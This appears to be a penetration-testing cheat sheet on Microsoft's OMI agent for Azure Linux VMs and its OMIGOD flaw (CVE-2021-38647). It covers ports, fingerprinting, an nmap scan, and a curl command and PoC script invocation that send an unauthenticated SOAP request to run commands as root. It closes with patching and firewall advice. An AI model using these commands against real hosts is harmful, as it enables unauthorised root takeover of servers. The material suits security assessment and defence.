OMI (OMIGOD)
aka omigod
Microsoft's Open Management Infrastructure agent, auto-installed on many Azure Linux VMs. CVE-2021-38647 (OMIGOD) lets an unauthenticated request with no auth header run commands as root.
Ports
| Port | Proto | Notes |
|---|---|---|
5986 | tcp | OMI HTTPS (WSMan) |
5985 | tcp | OMI HTTP |
1270 | tcp | OMI (legacy) |
Fingerprint
- WSMan/SOAP endpoint on a Linux host (not Windows WinRM)
- Server identifies as OMI
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2021-38647 | OMIGOD — unauthenticated RCE as root via missing auth header |
Exploitation primitives
- Send a WSMan ExecuteShellCommand SOAP request with NO Authorization header
- OMI treats the empty auth as the root client → command runs as root
- Common on Azure VMs with OMS/Log Analytics, Desired State Config, etc.
Overview
OMI is a Linux management agent (think WinRM for Linux) silently bundled with several Azure VM extensions. OMIGOD is the flaw where omitting the auth header makes OMI run your command as root.
Enumeration
Spot the OMI/WSMan endpoint on a Linux host:
nmap -p1270,5985,5986 -sV <TARGET>RCE (CVE-2021-38647)
Send the SOAP command with an empty Authorization header — root execution:
curl -k --header "Content-Type: application/soap+xml;charset=UTF-8" https://<TARGET>:5986/wsman -d @omigod.xmlPoC helper:
python3 omigod.py -t <TARGET> -c "id"Hardening
Patch OMI to ≥ 1.6.8.1, and firewall the OMI ports (1270/5985/5986) — they should never be internet-facing.